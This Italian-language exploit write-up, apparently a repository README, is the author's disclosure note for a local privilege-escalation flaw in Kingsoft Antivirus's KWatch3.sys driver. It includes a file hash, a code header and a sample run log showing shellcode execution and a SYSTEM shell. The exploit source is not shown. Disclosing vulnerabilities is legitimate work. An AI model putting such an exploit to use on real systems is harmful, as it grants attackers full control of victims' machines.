
Un exploit vecchio di anni di una vulnerabilità locale di EoP nel driver KWatch di Kingsoft Antivirus versione 2009.3.17.77.
Un exploit vecchio di anni di una vulnerabilità locale di EoP in Kingsoft Antivirus KWatch Driver versione 2009.3.17.77.
Ho segnalato il problema nel gennaio 2014 e sono stato informato del CVE oltre 8 anni dopo. Ho deciso di caricarlo perché è abbastanza divertente ritrovare il mio vecchio codice e che ci sia voluto così tanto tempo.
Quindi, questa non deve essere una nuova vulnerabilità nonostante il nuovo CVE -- una rapida ricerca ha mostrato più segnalazioni per la stessa vulnerabilità già.
Ringrazio comunque IPA per aver fatto la loro parte e per avermi rallegrato la giornata.
Il file vulnerabile sembra essere ffdedbaeccbcf0b697675b24ca313cbb8e1c9ba1bd2f0a0b58a2d6a04a038479
//
// Exploit for Kingsoft Antivirus KWatch Driver (KWatch3.sys)
// Target File Version: 2009.3.17.77
// Affected Product: Kingsoft Internet Security 9 Plus
//
/*
------------------------------------------------------------------------------
Shellcode is located at 7E7E7E7E.
The device was opened as 00000020.
Shellcode was executed.
The SYSTEM shell was launched.
This process will be suspended for ever.
------------------------------------------------------------------------------
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\user\Desktop>whoami
nt authority\system
------------------------------------------------------------------------------
*/